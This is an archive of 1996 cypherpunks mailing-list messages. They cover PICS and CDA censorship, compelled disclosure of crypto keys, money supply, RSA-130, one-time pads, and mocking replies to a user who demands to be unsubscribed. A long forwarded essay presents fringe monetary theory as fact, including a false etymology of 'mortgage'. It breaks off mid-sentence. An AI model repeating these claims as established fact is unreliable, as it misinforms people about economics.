>>From:  IN%"frantz@netcom.com"  6-APR-1996 16:21:56.32
>>
>>>I am less worried about this possibility than most.  PICS scrubbers will be
>>>as easy to produce as any other web intermediary.  (e.g. The one which
>>>replaces "bad" words with "censored".)
>>
>>       Quite... as will ones that flip-flop the various packet bits that
>>people are discussing. 
>
>This is a bit naive.  The "packet bits" I've discussed are added by the
>content provider (since he doesn't want to open himself to charges of
>"contributing to the delinquency of a minor", which exist regardless of
>the CDA) and packets with the "bits" are never delivered to the
>minors.  To think that someone along that path would subvert the system
>is ridiculous.

You are asuming that the (underage) user wouldn't route his packets thru an
offshore packet bit scrubber that some freedom-loving student set up to do
the bit scrubbing.  It is not even clear that any of the parties is
violating the law:

  The content provider is correctly labeling his packets.
  The transport agents are correctly passing them along.
  The bit scribber is running where such activities aren't illegal

The further you move the control from the home/school into the internet the
easier it is to subvert because there are more places to subvert it, more
people motivated to subvert it, and less control of the environment.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Eckenwiler <eck@panix.com>
Date: Wed, 17 Apr 1996 16:55:02 +0800
To: wb8foz@netcom.com (David Lesher)
Subject: Re: What can the judge do to me? (fwd)
In-Reply-To: <199604122346.TAA17990@netcom13.netcom.com>
Message-ID: <199604162044.QAA02937@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


+ From: Black Unicorn <unicorn@schloss.li>
+ 
+ "Contempts such as failure to comply with document discovery, for 
+ example, while occurring outside the court's presence, impede the 
+ court's ability to adjudicate the proceedings before it and thus touch 
+ upon the core justification for the contempt power....  Similarly, 
+ indirect contempts involving discrete, readily ascertainable acts, 
+ _such as turning over a key_ or payment of a judgment, properly may be 
+ adjudicated through civil proceedings since the need for extensive, 
+ impartial fact-finding is less pressing."  International Union, supra 
+ (emphasis added).
...
+ I think it's clear, the court literally spells this out, that holding 
+ a witness indefinitely until he complies with court orders is within 
+ the discretion of a judge.  Compelling through sanctions the 
+ production of a "key" (though I'm not sure a crypto key is directly 
+ contemplated) is likewise clearly permitted.

Producing a physical key may or may not be testimonial under the
"production privilege" doctrine established by the Supreme Court in
Fisher and the Doe cases.  Producing a *crypto* key -- if it exists
only in one's mind -- is indisputably full-fledged Fifth Amendment
testimony.  I refer you to the language in Doe II (joined by all 9
Justices) distinguishing between "the key to a safe and the
combination to a safe" -- the latter enjoying full Fifth Amendment
protection from forced disclosure.

(The message to which I'm responding was forwarded to me, as I do not
subscribe to c-punks.  If you want me to see a reply, cc me.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 10:39:24 +0800
To: Thomas Grant Edwards <tedwards@glue.umd.edu>
Subject: Re: Money supply is fake anyway
In-Reply-To: <Pine.SUN.3.91.960416114925.6156C-100000@kolo.isr.umd.edu>
Message-ID: <199604162053.QAA15518@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards writes:
> If the Fed was the only organization that create or destroyed money
> (through sales and purchases of federal securities), then the money supply
> could be finely controlled.  The reality is that the money supply can only
> be slightly controled by the Fed. 

You are confusing "Money Supply" with "Money". "Money Supply" is a
technical term and it doesn't even have a single definition -- there
are M1, M2, M3...

If you meant the activities of banks lead to expansion of the amount
of demand deposits in the world, yes, you are correct. However, at no
time do commercial banks loan out money that they do not have on
hand. If they give you a loan for $100, they have $100 available and
they can expect that if you don't deposit the $100 with them, that
they will have the $100 to give to the bank that you deposit the check
in. Now, because of fractional reserve banking, a bank will only have
a fairly small percentage of deposits in cash, but that is different
from a bank loaning out money that it doesn't have or creating
money. Only the fed gets to create money.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 10:42:22 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: List of reliable remailers
In-Reply-To: <9603168296.AA829685917@ccmail.wnyric.org>
Message-ID: <199604162100.RAA15552@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Pingitore writes:
>           GET ME OFF THIS DAMN LIST

No. I categorically refuse to take you off this mailing list.  I will
not lift a finger.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bharper@customcpu.com (Harper, Bill)
Date: Wed, 17 Apr 1996 19:08:34 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960417010838988.AAA157@[198.70.210.125]>
MIME-Version: 1.0
Content-Type: text/plain


I am very  interested in cryptography and all related subjects but I cannot
find enough info about it, and am wondering if anyone can please email me
anything you know and the basics. Thanks!  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 17 Apr 1996 18:39:40 +0800
To: Bruce Marshall <brucem@wichita.fn.net>
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <Pine.BSI.3.91.960416090319.2962C-100000@wichita.fn.net>
Message-ID: <199604170014.RAA07011@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>On Mon, 15 Apr 1996, Vladimir Z. Nuri wrote:
>
>> I have been wondering about malicious hackers getting into these
>> pools. would it be possible for them to contribute false data
>> that screws up the end results? or are such anomalies easily
>> discarded or disregarded by the final processes?
>
>> future implementors of these programs might amuse themselves with
>> trying to create such safeguards or anticipate such "attacks" which
>> are pretty significant the more the processes become distributed.
>
>    I guess I would have to ask you why you think hackers would be 
>interested in these projects in the first place?  Your typical hacker 
>would care very little about such a project and in fact may be interested 
>in seeing it succeed.  

the malicious type of hacker has the psychology of taking
great glee in tearing anything meaningful down. they don't
necessarily need a plausible reason. the purpose of destruction
alone can be a powerful motivating force. those who destroy
carefully constructed things for fun obtain a sense of power from it.

>    However, I do feel that you may have a valid point when switching 
>"hackers" to "opponents of the research."  Anyone with an interest in 
>preventing or slowing down the progress in such a project would be more 
>dangerous in my mind than your average hacker.  

the point is, when you are sharing your project among a lot of 
elements "out there" on a network, you have to worry more and 
more about "safe computing". when you are working on a purely
voluntary basis, what is your guarantee that everyone who volunteers
is actually on your side? again, a bigger problem the more a 
task is decentralized. one interesting argument in favor of centralized 
computing (I'm not saying it is a definitive argument, quite far
from that of course-- just pointing out that Distribution is
not necessarily the Panacea to All Problems).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 13:24:14 +0800
To: rick hoselton <hoz@univel.telescan.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604161843.LAA19508@toad.com>
Message-ID: <199604162134.RAA15579@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



rick hoselton writes:
> At 10:07 AM 4/16/96 -0400, Perry E. Metzger wrote:
> 
> >...Usually, random
> >sequences are non-compressable, but it is possible (though very
> >improbable) for Hamlet to appear out of a random number generator,
> >and it is of course quite compressable...
> 
> But even if it came from a completely random source, it would 
> still make a bad one-time pad.

No it wouldn't. There is a tiny but nonzero probability that xoring
your one time pad with your text will result in a cyphertext equal to,
say, the Bible. Big deal. If the key is really random, the
cryptanalyst has no way to tell what the underlying text was.

> In the context of "fair coin flips" the text of Hamlet is NOT compressible.

Huh?

There is only one context in which things are compressable or not --
is there a smaller representation for them.

> Because no string is more likely than any other.  Any algorithm that could 
> compress that string, will, on the average INCREASE the length of 
> "fair coin flip" strings it tries to compress.

True enough, but the claim was that a random string has no
representation which is smaller than itself.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 17 Apr 1996 18:25:02 +0800
To: cypherpunks@toad.com
Subject: "STOP SENDING ME THIS SHIT"
Message-ID: <ad99852e0a02100467c6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 PM 4/16/96, Adam Pingitore wrote:
>          STOP SENDING ME THIS SHIT


As this is one of several such messages this clown has sent us, despite
unsubscribe instructions having been posted several times in the last few
weeks, I am bouncing all of his inappropriate messages back to him (though
I am being careful--and I urge you all to be careful, too--to cut out any
cc:ing of others).

If you feel this jerk's posts are inappropriate, you might decide to do the
same as I am doing.

(Again, be careful to review the To: and cc: fields before sending, to
ensure that the list does not get spammed by your actions.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyap@mailhub.garban.com (Noel Yap)
Date: Wed, 17 Apr 1996 13:44:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9604162156.AA13666@mailhub.garban.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell <frissell@panix.com>
> The denizens of the DDR had to overcome the Stasi, barbed wire, mines,
> walls, tank traps, etc to adopt an open systems architecture.  Learning to
> use a few TCP/IP tricks (or building them into applications and using those
> applications) is much easier than breaching the Berlin Wall.

Knowledge about TCP/IP is alot easier to control than knowledge about the Berlin Wall (ie, how many Chinese will even know of the existence of TCP/IP -- in the US, where this is freely available, how many citizens know of it's existence)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 17 Apr 1996 17:50:03 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: PICS required by laws
In-Reply-To: <01I3GRMTAVBQ8Y510B@mbcl.rutgers.edu>
Message-ID: <199604162302.TAA16890@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" writes:
>From:	IN%"frantz@netcom.com"  6-APR-1996 16:21:56.32
>
>>I am less worried about this possibility than most.  PICS scrubbers will be
>>as easy to produce as any other web intermediary.  (e.g. The one which
>>replaces "bad" words with "censored".)
>
>	Quite... as will ones that flip-flop the various packet bits that
>people are discussing. 

This is a bit naive.  The "packet bits" I've discussed are added by the
content provider (since he doesn't want to open himself to charges of
"contributing to the delinquency of a minor", which exist regardless of
the CDA) and packets with the "bits" are never delivered to the
minors.  To think that someone along that path would subvert the system
is ridiculous.  As an example, the path for packets from playboy.com to
me is entirely controlled by two entities:  MCI (Playboy's provider)
and DigEx (my provider).  This will generally be true, and though the
number of entities may be larger, the "kinds" of entities will be the
same.  Even if we're discussing a mom & pop porno shop instead of
playboy, the general picture is the same:  the content provider will
hand off the labelled data to someone with "network common carrier"
status, who will not jeopardize that status by delivering the packets
to a minor's connection.

The sorts of organizations that form the core of the internet, and are
involved in this network layer censorship scheme, just *aren't* the
sort of "subversives" (or "patriots", take your pick) that would try to
bypass the system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 13:50:28 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: on corporations and subpoenas
In-Reply-To: <9603168296.AA829685776@ccmail.wnyric.org>
Message-ID: <199604162215.SAA00208@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Adam Pingitore" writes:
>           GET ME OFF THE DAMN LIST

I will never take you off. You might as well give up asking me now. I
have no intention of doing anything for you. You can rot so far as I'm
concerned.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 17 Apr 1996 16:51:08 +0800
To: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Subject: Re: Re[2]: GPS privacy/ECM
In-Reply-To: <9603168296.AA829685760@ccmail.wnyric.org>
Message-ID: <199604162215.SAA00216@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Adam Pingitore" writes:
>           STOP SENDING ME THIS SHIT

Sorry. You will just have to suffer. You are the only one who can help
yourself.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 17 Apr 1996 18:32:10 +0800
To: cypherpunks@toad.com
Subject: Re: Bidzos Holds Key / A hacker's paradise
In-Reply-To: <199604161938.VAA10239@utopia.hacktic.nl>
Message-ID: <199604162318.SAA01218@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Someone just asked me if it would be possible for the NSA to use a front 
company to buy crypto patents (or companies that own lots of crypto 
patents), then simply pull them off the market.

When I thought about it I couldn't understand why they haven't done it
already. 

Can whoever ends up with the rsa patent pull rsaref off the market, and
retroactively make software that uses it illegal?  Or would they just be 
able to prevent people from writing new code with rsaref?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab756@freenet.toronto.on.ca (Graham Bullers)
Date: Wed, 17 Apr 1996 17:25:17 +0800
To: Cypherpunks@toad.com
Subject: MORE ON MONEY
Message-ID: <m0u9JDK-0000hpC@queen.torfree.net>
MIME-Version: 1.0
Content-Type: text/plain




    TURMEL:      Mathematics of how Interest works


           GREENDOLLAR AND TIMEDOLLAR LETSYSTEM ENGINEERING
 
     The problem of debt is created within the banking system and 
therefore a thorough understanding of the banking system is helpful. 
The money system is the only mechanical system not under the 
jurisdiction of engineers. Control has been usurped by economists. All 
others systems improve, the only one controlled by economists is 
failing. It's time scientists regain control of this errant system 
from which come all the financial woes of the world.
     As an electrical engineer specialized in banking systems, I will 
endeavor to explain the inner workings of this mysterious system at 
every possible level and its effects on users and debt. Though this 
might sound daunting, I think I can present an easy way of handling 
subjects such as 
     - plumbing analogy with pipes for flows of money
     - simple algebra
     - exponential functions
     - differential equations
     - Laplace transformations
     - control system circuitry
 
FALLACIES
     The two Big Lies of Economics and Banking are that:
     1) Banks lend their depositors' savings.
     2) Interest rates fight inflation;
     Banks do not lend out their depositors' funds, they lend out 
brand new money. Interest does not fight inflation, it causes it. 
 
HOW BANKS CREATE MONEY
     The inner workings of the engineering design of the Canadian 
"fractional reserve" banking system are mysterious to many but no 
matter how complex the actual process of creating money is, it can 
accurately be simplified to "HAVING THE MONEY PLATES," whether they be 
plates for changing metal to coins, plates for changing paper to 
notes, or plates inside a bank's computer changing electrical blips to 
bank deposits on which checks may be written. 
     Since changes in the money supply are regularly reported, money 
must enter the supply from a source and leave through sink. Our 
liquidity system has both a tap and a drain. Since the government 
borrows money itself, it does not have control of the tap. Who 
controls the tap and the drain of the money supply?
     The easiest way to model our system of financial liquidity is 
with plumbing. All banking systems have the same exterior connections 
to the economy. 
     Draw two squares side by side each. Title the first a "Piggy 
Bank" and the second "Chartered Bank." 
     For both, draw three arrows going in at the 
top labelled "Deposits," "Interest paid," "Loans paid." 
     Draw three arrows coming out from the bottom labelled 
"Withdrawals," "Expenses," Loans made."
     In the Piggy Bank, draw a rectangle wide enough to accept all 
three input flows and all three output flows. Label it "Reservoir."
 
                           PIGGY BANK 
 
              Deposits    Interest(paid)  Loans Paid
                  |             |             |     
                  |             |             |     
     |------------|-------------|-------------|--------------|
     |            |             |             |              |
     |            |             |             |              |
     |       |----|-------------|-------------|----|         |
     |       |                                     |         |
     |       |                                     |         |
     |       |              RESERVOIR              |         |
     |       |                                     |         |
     |       |                                     |         |
     |       |----|-------------|-------------|----|         |
     |            |             |             |              |
     |            |             |             |              |
     |------------|-------------|-------------|--------------|
                  |             |             |     
                  |             |             |     
            Withdrawals     Expenses      Loans Made
 
 
     The interior plumbing of a piggy bank reservoir system shows that 
a deposit is first made into the reservoir and a loan is then taken 
out of the reservoir which causes no increase in money supply. 
Conversely, when a loan is paid, it goes into the reservoir and there 
is no decrease in the money supply. A reservoir piggy bank system does 
not affect the money supply because there is no tap and no drain.
     Though the Bank of Canada operates a tap and adds a small amount 
of "high-powered" money to the money supply, Graham Towers, a former 
Governor of the Bank of Canada, pointed out that "The banks do not 
lend out the money of their depositors. Each and every time a bank 
makes a loan, new bank credit is created, new deposits, brand new 
money." So a chartered bank has a tap and is not the pure reservoir 
system like a piggy bank model!
     In the Chartered Bank, draw a rectangle wide enough to accept 
only the first two input flows and first two output flows. Label it 
"Reservoir." 
     Draw a circle above the "Loans Out" flow, put a positive sign 
within, and draw the line to the circle. Label it the "Tap." 
     Draw a circle below the "Loans in" flow, put a negative sign 
within, and draw the line to the circle. Label it the Drain.  
 
                     FRACTIONAL RESERVE BANK
 
              Deposits     Interest(in)   Loan Payments
                  |             |              |     
                  |             |              |     
     |------------|-------------|--------------|-------------|
     |            |             |              |             |
     |            |             |          |---|---|         |
     |       |----|-------------|----|     | DRAIN |         |
     |       |                       |     |-------|         |
     |       |                       |                       |
     |       |       RESERVOIR       |                       |
     |       |                       |                       |
     |       |                       |     |-------|         |
     |       |----|-------------|----|     |  TAP  |         |
     |            |             |          |---|---|         |
     |            |             |              |             |
     |------------|-------------|--------------|-------------|
                  |             |              |     
                  |             |              |     
            Withdrawals   Bank Expenses    Loans Out
 
     The interior plumbing of a chartered bank shows that the loans do 
not come out of the savings reservoir but come out of the tap of new 
money. When a chartered bank makes a loan, the amount of money in 
circulation goes up. When a loan is repaid, it goes down. In the 
textbook Economics by Lipsey, Sparks, Steiner, it states "The banking 
system as a whole can create deposit money." Therefore, the banks all 
have their very own tap, their very own set of electronic money 
plates. 
     This power to refuse to turn on the tap for one businessman and 
foreclose while turning it on for another so that other can buy out 
the first businessman at auction is not fully appreciated.
     The injection of new money from their taps has been well hidden 
from the public view because the Bank Act insists that before any new 
money may be loaned into circulation, old money must be deposited into 
their reservoirs. It's just as if a casino were to insist on old chips 
being put into the safety deposit section before it would issue new 
chips. By merely matching new loans to deposits, this brilliant cover 
for the turning on of the tap misleads observers into falsely 
concluding that a chartered bank operates like a piggy bank. With a 
lawful reason to seek deposits before they can lend, there is no 
outward difference between chartered bank and a piggy bank. Yet, banks 
do not seek deposits to lend to other people. They seek them to 
lawfully turn on the tap. 
     The famous "reserve ratio" of a "fractional reserve system" 
simply means that a fraction of all deposits is sent to the Bank of 
Canada's reservoir and the bank is then allowed to turn on the tap to 
match the deposits remaining in their reservoir. Banks create most of 
the money in circulation. To go step by step through the plumbing with 
a 10% reserve ratio, let the Bank of Canada turn on its tap and put 
$100 of "high-powered" new money into circulation:
Depositing $100 into bank reservoirs turns on the tap for $90 more. 
These $90 end up deposited turning on the tap for $81 more. 
Depositing $81 into bank reservoirs turns on the tap for $72 more. 
Etc. until $10 into bank reservoirs turns on tap for $9 more.
Etc. until $1 into bank reservoirs turns on tap for $.90 more.
Etc. until the total deposits reaches a maximum of $1,000 with $900 
newly created dollars added to the system by the chartered banks for 
every $100 issued by the Bank of Canada. This limit is the inverse of 
the reserve ration. A reserve ratio of 5% would generate total new 
money of 1/.05 = 20 times the initial high-powered Bank of Canada 
money.
     The demonstrates that the problem with the money system is that 
the amount of mass put into circulation is not a function of the 
production possible but of past savings of money. 
     The major difference between a casino bank and a chartered bank 
is that the liquidity from a casino bank never suffers inflation while 
the liquidity from a chartered bank always suffers inflation. Since 
the hardware of a casino bank, chips of different colors and 
denominations, is functionally identical to the hardware of a 
chartered bank, computer credit pulses and coins or paper of different 
colors and denominations, inflation is not a hardware problem. It is a 
software problem. There is something wrong with the program which 
regulates how money is put into and taken out of circulation. There is 
nothing wrong with the hardware of our tap and drain system. It is the 
operators of the taps who are improperly restricting the flows.
     To fully appreciate our present predicament, consider a train-
master in a wartime situation who, when he was ordered to ensure that 
an invading army did not capture the system in operating condition, 
burned all of the railroad tickets. Our failure to use our manpower, 
materials and tools because there are insufficient monetary tickets 
puts us in the same category as the invading army who failed to use 
the captured railway because they couldn't find any railway tickets. 
To get out of this silly predicament, public control of the money tap 
must be regained. 
 
HOW "MORT-GAGE" INTEREST CREATES A DEATH-GAMBLE
     The word "mort-gage" is derived from the French word "mort" 
meaning "death" and "gage" meaning "gamble". Bankers create the money 
supply when they make loans. Producers are forced to gamble by 
borrowing newly created Principal(P) to pay for production costs and 
then inflating their prices to earn back the Principal and 
Interest(P+I) in sales. Because total goods priced at (P+I) can never 
be sold when consumers only have P dollars available, a minimum amount 
of goods must remain unsold and a minimum number of producers must 
fail and suffer foreclosure. The economist Keynes likened the mort- 
gage death-gamble to the game of musical chairs. Just as there are 
insufficient chairs for all to survive the musical chairs death-
gamble, so too, there is insufficient money for all to repay (P+I) and 
survive the mort-gage death-gamble.
 
P < principle, I < Interest, i < Interest Rate, t < Time
                               PERCENT    ALGEBRA   EXP. FUNC
Production costs (principal)     100         P          1
 
Production prices (Debt)        100+i       P+I       exp(it)
 
Purchasable Value                100         P           1
or ratio of money to prices     -----      -----      -------
or survivors                    100+i       P+I       exp(it)
 
Unpurchasable value               i          I             1
or forced unemployment     U=  -----      -----    1 - --------
or non-survivors                100+i       P+I         exp(it)
 
For U=0, let                     i=0        I=0      i=0 or t=0
 
     The odds of survival are always set by the interest rate(i). 
P/(P+I) survive, I/(P+I) do not. 
 
INFLATION
     The equation for the minimum inflation (J) we must suffer is the 
same as the equation for unemployment (U) because the fraction of the 
people foreclosed on is the fraction of collateral confiscated.      
     Draw a large H and label the first left line as "$" and the right 
line "Collateral." 
     Draw a small arrow up from the left axis. Label it "Shift A." 
     Draw another arrow down from the right axis labelled "Shift B." 
     Draw a line from the tip of the "Shift A" arrow to the base of 
the "Shift B" arrow and vice versa.
 
                 Dollars     Assets
                    |           |
           ________ |           |
                    |\          |
                    |  \        |
            Shift A |    \      |
                    |      \    |                 
                    |        \  |
           ________ |__________\|________
                    |\          |
                    |  \        |
                    |    \      | Shift B
                    |      \    |
                    |        \  |
                    |          \| ________
                    |           |
                    |           | 
                    |           |
 
     Though we are led to believe that inflation is caused by an 
increase in the money chasing the goods (Shift A), actually, due to 
foreclosures, it is caused by a decrease in the collateral backing up 
the money (Shift B). Though both inflations shifts feel the same, the 
graph shows inflation is the direct function of interest, not the 
inverse exposing the Big Lie that interest fights inflation. 
     Most people who have not studied economics, if asked whether 
interest fights or causes inflation, are quick to agree that a merchant 
must pass on increased interest costs in his prices and therefore it 
is evident that increased interest costs will result in increased 
prices. After a thorough brainwashing, economists have been convinced 
that increased interest costs will result in decreased prices as they 
constantly explain that "interest fights inflation."
 
DIFFERENTIAL EQUATIONS
     The differential equation dB/dt = iB states that the 
increase or decrease of a bank balance (dB/dt), whether credit or 
debt, is equal to the interest rate (i) times the old balance 
(B). 
     The solution to the differential equation is exp(it) where t 
= time. We can now examine the problem, not over one cycle with 
algebra, but over time with exponential functions. Exp(it) is a 
non-linear function, crooked. 
     Draw an X axis labelled "Time" with units of 0, 1T, 2T, 3T..
     Draw a Y axis labelled "$" with units of 0 to 16.
     At Y=1, draw a line to the right.
     At Y= -1, draw another to the right. 
     At X=1T, make a point at Y=2 and Y=(-2).
     At X=2T, make a point at Y=4 and Y=(-4).
     At X=3T, make a point at Y=8 and Y=(-8).
     At X=4T, make a point at Y=16 and Y=(-16).
     Join the points. Label the curve going up +B*exp(it) and the 
curve going down as -B*exp(it).
 
GRAPH#2      1600|                            B*exp(it)  $1600
                 |                                      $
             1400|                                     $ 
                 |                                    $
             1200|                                   $
                 |                                  $
             1000|                                 $  
                 |                               $  
              800|                             $800
                 |                           $
              600|                         $
                 |                      $
              400|                   $400
                 |               $
              200|         $200                      +B
                 $-------------------------------------> time Yrs
                 0---------1---------2---------3---------4-------
                -$------------------------------------->  
             -200|        -$200                      -B
                 |               $
             -400|                  -$400
                 |                      $
             -600|                         $                           
                 |                           $
             -800|                            -$800
                 |                               $
            -1000|                                 $
                 |                                  $
            -1200|                                   $
                 |                                    $
            -1400|                                     $
                 |                          -B*exp(it)  $
            -1600|                                      -$1600
 
     Consider that if two men are in a car accident and one owes 
the other money, if there there is no interest, the debt stays 
friendly, social and Christian like the two straignt lines for 
one owing -100 and the other being owed $100. The two straight 
lines from at +100 and -100 represent the growth of the debt and 
credit. Zero. 
     If there is interest, the balances start to grow with time 
and double in time T, then again in time and again and again. 
Follow the $ curves to see how interest makes balances grow 
exponentially. 
     For the record, the differential equation for inflation (J) 
can be described as:
                      dJ^2/dt^2 + (i)dJ/dt   = 0 
or                         j''  + (i)j'      = 0 
 
LAPLACE TRANSFORMATIONS
      The Laplace transform of the balance B is 1/(s-i) where "s" 
is the Laplace constant. The moment the debt passes through the 
usury filter in banking system accounts, (1/(s-i)), it starts to 
grow.
     For the record, the Laplace transformation of the inflation 
(J)  whose solution is (1-exp(-it)) is:
                           1 / s(s+i)
 
CONTROL SYSTEMS
     With the Laplace transform, it is also possible to draw the 
electrical blueprint of a bank account in the usury banking 
system:
 
                                       |---------|
                                       |    1    |
   CONTROL SYSTEM FOR           ------->  -----  |--------->
                                       |   s-i   |
                                       |---------|
 
 
                       |----------------|
                       | Interest = 10% | 
                  |<---|   Rate         |<---------|
                  |    |----------------|          |
                  |                                | Old    
                  |                   |<-----------| Balance
                  |                   |            |
                + |                 + |            |
           |------------|       |------------|     |
  Input  + |  Addition  |     + |  Addition  | New | 
---------->|    Node    |------>|    Node    |--------------->
           |------------|       |------------| Balance
 
     Draw two circles about two inches apart with a plus sign 
within both. These are addition nodes.
     Draw arrows from left to right right through both. Where all 
arrowheads touch a circle, draw a little plus sign. Label the 
left arrow "Input," the middle arrow "Total Input," and the right 
arrow "New Balance." 
     Draw a small rectangle labelled "Interest Rate" above and 
between the two circles. 
     Draw a line up to the right of the circles, an arrow to the 
rectangle, a line out stopping over the first circle and an arrow 
down to the first circle. Label the arrow "Interest." 
     Draw another arrow to the left and down to the second circle 
but not through the rectangle. Label this arrow "Old Balance."
     This is the control system of the usury banking system. 
     This blueprint of a usury bank account shows that added to 
any input is the feedback of the interest rate times the previous 
balance which can be positive or negative. This net amount is 
added to the previous balance to produce the new balance. This 
positive feedback makes the system unstable and the root of bad 
vibrations. 
     Your $100 volt pulse is the input to the first addition 
node. Added to it is the interest voltage from the last balance 
which, to start, was 10% of zero. The new net $100 pulse enters 
the second addition node where it also is added to the old 
balance, still zero, to push the new balance up to $100 volts. 
     Next year, with no new pulse at the input, added to this 
zero voltage is 10% interest, a pulse of 10 volts. The 10 volt 
pulse goes into the second addition node where it is added to the 
old balance, 100, to push the new balance to 110. 
     Cycle after cycle with no new inputs, you have the 
exponential growth exp(it) which grows as the above series. It 
acts just like bringing a microphone up to a speaker. The sound 
from the speaker is picked up by the microphone and fed back to 
make the sound out of the speaker louder which is picked up and 
fed back to make it louder until you blow your speaker. Having an 
unstable positive feedback loop built into a system makes that 
system unstable. 
     Negative feedback loops where the feedback from the previous 
balance is subtracted are very useful in stabilizing systems away 
from error but positive feedback always makes the error grow.
     A physical example of negative feedback, positive feedback 
and no feedback follows:
     If you have a bowl and you put a ball in it and then give 
the ball a little shove, it will travel up one side, gravity will 
bring it down and it will rock back and forth until it settles 
back to the middle. That's how engineers use negative feedback to 
bring back things which have been pushed out of normal operation 
back to normal. 
     If you turn the bowl upside down and put the ball at the 
top, one small push and the gravity will make the ball fall 
faster and faster. That's unstable.
     If you put the ball on a platform and give it a push, 
without friction, it will just continue in rolling steady state. 
     Both zero and negative feedback are acceptable while 
positive feedback is always unacceptably unstable. 
     Engineers say that systems are stable if the pole of the 
system is in the left-hand plane or on the origin but unstable if 
the pole is in the right-hand plane. 
     Knowing that the Laplace Transform of the system is 1/(s-i), 
the denominator is zero when s=+i and therefore, the pole is on 
the right-hand side of the origin, hence unstable. 
     Eliminating the bad vibrations is as simple as making the 
interest feedback loop in the bank's computer programs zero and 
using only the simple interior circuit known as an "integrator." 
Currency systems presently using these simple "integrator" 
accounts are now known internationally as Greendollar systems of 
the Local Employment Trading System (LETS). 
 
     We know that the LETSystem is an interest-free system and so 
we cut the positive feedback loop to get 1/(s-0).
 
                                       |---------|
                                       |    1    |
   CONTROL SYSTEM FOR           ------->  -----  |--------->
                                       |    s    |
                                       |---------|
 
                                              /\
                                                \
                       |----------------|        \
                       | Interest = 10% |         \
                  |<---|   Rate         |          |
                  |    |----------------|          |
                  |                                | Old    
                  |                   |<-----------| Balance
                  |                   |  Balance   |
                + |                 + |            |
           |------------|       |------------|     |
  Input  + |  Addition  |     + |  Addition  |     | New      
---------->|    Node    |------>|    Node    |---------------:
           |------------|       |------------|       Balance
 
 
     This leaves us with only the interior circuit: 1/s
 
                                       |---------|
                                       |    1    |
   CONTROL SYSTEM FOR           ------->  -----  |--------->
                                       |    s    |
                                       |---------|
                                                    
                 |<-----------| Old    
                 |            | Balance
                 |            |
           |------------|     |
  Input  + |  Addition  | New |    
---------->|  Node      |--------------->
           |------------| Balance
 
     This is the mathematical circuitry behind all interest-free 
systems and how Greendollars work. 
     Instead of an output which is exponential, crooked, we have 
an output which is linear, straight.      
     Your $100 volt pulse is the input to the addition 
node. Added to it is old balance, starting at zero, to push the 
new balance up to $100 volts. 
     Next year, with no new pulse at the input, and with interest 
voltage to add, the balance stays at $100 volts. If another 
deposit comes in, it's added to the old balance to create a new 
balance. A negative coming in will reduce the old balance. But 
the system is always in balance. Positives equal negatives. 
 
     This analysis shows that unemployment and inflation must go to 
zero if the banks' computers, which are now permitted to charge both 
interest and service charges, are restricted to only the service 
charge.
     Note that the exponential derivation shows that there are two 
solutions to the mort-gage (death-gamble). The software solution is 
interest rate(i) = 0 by restricting the banks computers to a pure 
